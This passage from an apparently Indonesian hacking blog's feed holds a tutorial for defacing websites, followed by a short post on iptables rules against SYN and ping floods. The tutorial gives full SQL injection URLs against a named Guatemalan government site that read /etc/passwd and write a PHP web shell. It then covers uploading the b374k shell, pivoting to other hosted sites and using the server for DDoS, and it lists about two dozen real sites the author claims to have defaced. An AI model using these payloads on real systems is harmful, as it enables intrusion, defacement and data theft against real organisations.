<li><a href="http://merka.com.gt/media/Image/james0baster.html">http://merka.com.gt/media/Image/james0baster.html</a></li>
<li><a href="http://difoto.com/media/Image/james0baster.html">http://difoto.com/media/Image/james0baster.html</a></li>
<li><a href="http://web.ecssa.com.gt/media/Image/james0baster.html">http://web.ecssa.com.gt/media/Image/james0baster.html</a></li>
<li>http://dmarie.com.gt/media/Image/james0baster.html</li>
<li>http://www.horcalsa.com/media/Image/james0baster.html</li>
<li>http://aplytek.com/media/Image/james0baster.html</li>
<li>http://www.ffacsa.com/media/Image/james0baster.html</li>
<li>http://www.palixcan.com/media/Image/james0baster.html</li>
<li>http://www.rototec.com.gt/media/Image/james0baster.html</li>
<li>http://www.pinbol.net/media/Image/james0baster.html</li>
<li>http://www.nisfessa.com/media/Image/james0baster.html</li>
<li>http://www.fmglobo.com.gt/media/Image/james0baster.html</li>
<li>http://www.artgala.org/media/Image/james0baster.html</li>
<li>http://www.cognos.com.gt/media/Image/james0baster.html</li>
<li>http://www.saluvita.com.gt/media/Image/james0baster.html</li>
<li>http://www.copredeh.gob.gt/media/Image/james0baster.html</li>
<li>http://adinmsa.com/media/Image/james0baster.html</li>
<li>http://elmastil.com/media/Image/james0baster.html</li>
<li>http://starkids.com.gt/media/Image/james0baster.html</li>
<li>http://www.inacif.gob.gt/design/default/james0baster.html</li>
</ul>
<p><a href="http://www.cinde.com.gt/webcontrol/james0baster.html"></a></p>
<p><a href="http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html"></a></p>
<p><a href="http://www.asociacioncambiandovidas.org/media/Image/james0baster.html"></a></p>
<p><a href="http://sanjuansacatepequez.com.gt/media/Image/james0baster.html"></a></p>
<p><a href="http://merka.com.gt/media/Image/james0baster.html"></a></p>
<p><a href="http://difoto.com/media/Image/james0baster.html"></a></p>
<p><a href="http://web.ecssa.com.gt/media/Image/james0baster.html"></a></p>
<p>dan masih banyak lagi <img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/6.gif" style="border:none;background:none;" alt=":p" /></p>
<p>sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih</p>
<p><a href="http://www.inacif.gob.gt/design/default/james0basterscaner.php">http://www.inacif.gob.gt/design/default/james0basterscaner.php</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scanerajib.jpg"><img class="size-full wp-image-188 aligncenter" title="scanerajib" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scanerajib.jpg" alt="" width="515" height="326" /></a></p>
<p>NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDEN AJA.</p>
<p>ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/deface.jpg"><img class="alignleft size-full wp-image-167" title="deface" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/deface.jpg" alt="" width="249" height="211" /></a>Wah dah lama ga ngeblog</p>
<p>kali ini gw mau share beberapa teknik2(POC) buat ngedeface .</p>
<p>kalo yang sudah pada tau teknik2 ini jangan pada ngina</p>
<p>yah maklum nubie mau coba bikin artikel <img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/6.gif" style="border:none;background:none;" alt=":p" /></p>
<p>yang sudah baca yah jangan lupa komen2nya</p>
<p>yah itung2 belajar bareng <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>ok mulai aja deh ke tutor</p>
<p><span id="more-164"></span></p>
<p>hal yg diperlukan :</p>
<ol>
<li>berdoa</li>
<li>siapin makanan ringan</li>
<li>dan segelas kopi (java)</li>
<li>koneksi internet + komputernya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
</ol>
<p>nah kalo udah pada siap liangsung pergi ke om <a href="http://google.co.id">google </a> untuk melakukan pencarian dengan dork :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg"><img class="size-full wp-image-155 aligncenter" title="googeling" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg" alt="" width="614" /></a></p>
<p>kemudian pilih deh web target yang memiliki vulnerability <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>target : <a href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file('/etc/passwd'),8,9,10/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8242;+union+select+1,2,0&#215;3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(&#8216;/etc/passwd&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />,8,9,10/*</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/target.jpg"><img class="size-full wp-image-158 aligncenter" title="target" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/target.jpg" alt="" width="614" /></a></p>
<p>setelah masuk ke website targget ubah url nya yg tadinya <span style="color: #ff0000;">load_file(&#8216;/etc/passwd&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" /> <span style="color: #000000;">menjadi</span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"> <span style="color: #ff0000;">&#8220;&lt;?php echo \&#8217;&lt;pre&gt;\&#8217;;system($_GET[\'cmd\']);echo \&#8217;&lt;/pre&gt;\&#8217;;?&gt;&#8221;</span> </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">dan diakhir url ditambahkan </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><span style="color: #ff0000;"> +INTO+OUTFILE+&#8221;lokasi direktory(folder) yang permisionya 777/namashell.php&#8221;/*</span></span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">real target : <a href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,3,4,5,6,&quot;&lt;?php echo \'&lt;pre&gt;\';system($_GET[\'cmd\']);echo \'&lt;/pre&gt;\';?&gt;&quot;,8,9,10+INTO+OUTFILE+&quot;/home/inacif/www/design/default/james0bastershell.php&quot;/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8242;+union+select+1,2,3,4,5,6,&#8221;&lt;?php echo \&#8217;&lt;pre&gt;\&#8217;;system($_GET[\'cmd\']);echo \&#8217;&lt;/pre&gt;\&#8217;;?&gt;&#8221;,8,9,10+INTO+OUTFILE+&#8221;/home/inacif/www/design/default/james0bastershell.php&#8221;/*</a></span></span></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown.jpg"><img class="size-large wp-image-157 aligncenter" title="spown" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown-1024x306.jpg" alt="" width="614" /></a></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><br />
</span></span></p>
<p>setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil</p>
<p>atau tidak dengan menjalankan perintah ls -al pada cmd=</p>
<p>real target : <a href="http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls%20-al">http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-sederhana.jpg"><img class="size-full wp-image-156 aligncenter" title="shell sederhana" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-sederhana.jpg" alt="" width="614" /></a></p>
<p>upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  dengan perintah</p>
<p>download sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/upload.jpg"><img class="size-large wp-image-159 aligncenter" title="upload" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/upload-1024x434.jpg" alt="" width="614" /></a></p>
<p>dan hasilnya sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell.jpg"><img class="size-large wp-image-165 aligncenter" title="shell" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-1024x442.jpg" alt="" width="614" /></a></p>
<p>bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.</p>
<p>kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg"><img class="size-full wp-image-166 aligncenter" title="scaner" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg" alt="" width="444" height="495" /></a></p>
<p>berikut hasil URL jumpingan dari <a href="http://www.inacif.gob.gt/" target="_self">http://www.inacif.gob.gt/</a> ke  <a href="http://www.cinde.com.gt/" target="_self">http://www.cinde.com.gt/</a></p>
<p>URL : <a href="http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/">http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/</a></p>
<p>dan berikut hasil defaceannya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<ul>
<li><a href="http://www.cinde.com.gt/webcontrol/james0baster.html">http://www.cinde.com.gt/webcontrol/james0baster.html</a></li>
<li><a href="http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html">http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html</a></li>
<li><a href="http://www.asociacioncambiandovidas.org/media/Image/james0baster.html">http://www.asociacioncambiandovidas.org/media/Image/james0baster.html</a></li>
<li><a href="http://sanjuansacatepequez.com.gt/media/Image/james0baster.html">http://sanjuansacatepequez.com.gt/media/Image/james0baster.html</a></li>
<li><a href="http://merka.com.gt/media/Image/james0baster.html">http://merka.com.gt/media/Image/james0baster.html</a></li>
<li><a href="http://difoto.com/media/Image/james0baster.html">http://difoto.com/media/Image/james0baster.html</a></li>
<li><a href="http://web.ecssa.com.gt/media/Image/james0baster.html">http://web.ecssa.com.gt/media/Image/james0baster.html</a></li>
<li>http://dmarie.com.gt/media/Image/james0baster.html</li>
<li>http://www.horcalsa.com/media/Image/james0baster.html</li>
<li>http://aplytek.com/media/Image/james0baster.html</li>
<li>http://www.ffacsa.com/media/Image/james0baster.html</li>
<li>http://www.palixcan.com/media/Image/james0baster.html</li>
<li>http://www.rototec.com.gt/media/Image/james0baster.html</li>
<li>http://www.pinbol.net/media/Image/james0baster.html</li>
<li>http://www.nisfessa.com/media/Image/james0baster.html</li>
<li>http://www.fmglobo.com.gt/media/Image/james0baster.html</li>
<li>http://www.artgala.org/media/Image/james0baster.html</li>
<li>http://www.cognos.com.gt/media/Image/james0baster.html</li>
<li>http://www.saluvita.com.gt/media/Image/james0baster.html</li>
<li>http://www.copredeh.gob.gt/media/Image/james0baster.html</li>
<li>http://adinmsa.com/media/Image/james0baster.html</li>
<li>http://elmastil.com/media/Image/james0baster.html</li>
<li>http://starkids.com.gt/media/Image/james0baster.html</li>
<li>http://www.inacif.gob.gt/design/default/james0baster.html</li>
</ul>
<p><a href="http://www.cinde.com.gt/webcontrol/james0baster.html"></a></p>
<p><a href="http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html"></a></p>
<p><a href="http://www.asociacioncambiandovidas.org/media/Image/james0baster.html"></a></p>
<p><a href="http://sanjuansacatepequez.com.gt/media/Image/james0baster.html"></a></p>
<p><a href="http://merka.com.gt/media/Image/james0baster.html"></a></p>
<p><a href="http://difoto.com/media/Image/james0baster.html"></a></p>
<p><a href="http://web.ecssa.com.gt/media/Image/james0baster.html"></a></p>
<p>dan masih banyak lagi <img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/6.gif" style="border:none;background:none;" alt=":p" /></p>
<p>sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih</p>
<p><a href="http://www.inacif.gob.gt/design/default/james0basterscaner.php">http://www.inacif.gob.gt/design/default/james0basterscaner.php</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scanerajib.jpg"><img class="size-full wp-image-188 aligncenter" title="scanerajib" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scanerajib.jpg" alt="" width="515" height="326" /></a></p>
<p>NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDEN AJA.</p>
<p>ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;n=POC+buat+ngedeface%2B%2B&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/poc-buat-ngedeface/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B&amp;desc=Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;t=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=POC+buat+ngedeface%2B%2B&amp;body=Link: http://www.james0baster.web.id/v2/poc-buat-ngedeface/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B&amp;srcUrl=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;srcTitle=POC+buat+ngedeface%2B%2B&amp;snippet=Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;t=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=POC+buat+ngedeface%2B%2B&amp;body=Link: http://www.james0baster.web.id/v2/poc-buat-ngedeface/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22POC%20buat%20ngedeface%2B%2B%22&amp;body=Link: http://www.james0baster.web.id/v2/poc-buat-ngedeface/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;bm_description=POC+buat+ngedeface%2B%2B&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;t=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=POC+buat+ngedeface%2B%2B+-+http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;title=POC+buat+ngedeface%2B%2B" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/poc-buat-ngedeface/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=POC+buat+ngedeface%2B%2B+-+http://bit.ly/emXKxo&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/poc-buat-ngedeface/&amp;submitHeadline=POC+buat+ngedeface%2B%2B&amp;submitSummary=Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=POC+buat+ngedeface%2B%2B&amp;body=Link: http://www.james0baster.web.id/v2/poc-buat-ngedeface/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Wah%20dah%20lama%20ga%20ngeblog%0D%0A%0D%0Akali%20ini%20gw%20mau%20share%20beberapa%20teknik2%28POC%29%20buat%20ngedeface%20.%0D%0A%0D%0Akalo%20yang%20sudah%20pada%20tau%20teknik2%20ini%20jangan%20pada%20ngina%0D%0A%0D%0Ayah%20maklum%20nubie%20mau%20coba%20bikin%20artikel%20%3Ap%0D%0A%0D%0Ayang%20sudah%20baca%20yah%20jangan%20lupa%20komen2nya%0D%0A%0D%0Ayah%20itung2%20belajar%20bareng%20%3A%29%0D%0A%0D%0Aok%20mulai%20aja%20deh%20ke%20tutor%0D%0A%0D" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/poc-buat-ngedeface/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/poc-buat-ngedeface/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Mencegah serangan Syn &amp; Ping Flood Attack (DOS)</title>
		<link>http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/</link>
		<comments>http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/#comments</comments>
		<pubDate>Sat, 07 Aug 2010 02:46:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[ICT]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Jaringan Komputer]]></category>
		<category><![CDATA[Keamanan]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[Komputer]]></category>
		<category><![CDATA[Pemerograman]]></category>
		<category><![CDATA[Tips and Trick]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=153</guid>
		<description><![CDATA[<p style="text-align: center;">
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/image005.jpg"><img class="size-full wp-image-154 aligncenter" title="image005" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/image005.jpg" alt="" width="553" height="526" /></a></p>
<p>1. Mencegah paket Syn Flood Attack<span id="more-153"></span><br />
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket syn yang dicurigai jahat<br />
iptables -N synjahat<br />
iptables -A INPUT -p tcp &#8211;syn -j synjahat<br />
iptables -A synjahat -m limit &#8211;limit 1/s &#8211;limit-burst 3 -j ACCEPT<br />
iptables -A synjahat -j DROP</p></blockquote>
<p>kemudian jalankan di konsole/terminal</p>
<blockquote><p>root@bt:~# sh closesyn.sh</p></blockquote>
<p>2. Mencegah Ping Flood attack<br />
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket ping(icmp) yang dicurigai jahat<br />
iptables -N pingjahat<br />
iptables -A INPUT -p icmp -j pingjahat<br />
iptables -A pingjahat -m limit &#8211;limit 1/s &#8211;limit-burst 2 -j ACCEPT<br />
iptables -A pingjahat -j DROP</p></blockquote>
<blockquote><p>root@bt:~# sh closeping.sh</p></blockquote>
<p>coba lakukan testing dengan perintah</p>
<blockquote><p>root@bt:~#ping [target] -s 6500</p></blockquote>
<p>Ok sekian dulu. Thank&#8217;s jika ada yang kurang jelas silahkan tanya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><sub>This article was originally published in forum thread: <a href="http://www.indonesianhacker.or.id/content/threads/5121-Mencegah-serangan-Syn-amp-Ping-Flood-Attack-(DOS)" target="_self">Mencegah serangan Syn &amp; Ping Flood Attack (DOS)</a> started by <a href="http://www.indonesianhacker.or.id/content/members/1707-bilanganbiner" target="_self">bilanganbiner</a> </sub><sub><a href="http://www.indonesianhacker.or.id/content/threads/5121-Mencegah-serangan-Syn-amp-Ping-Flood-Attack-(DOS)?p=62950#post62950" target="_self">View original post</a></sub></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
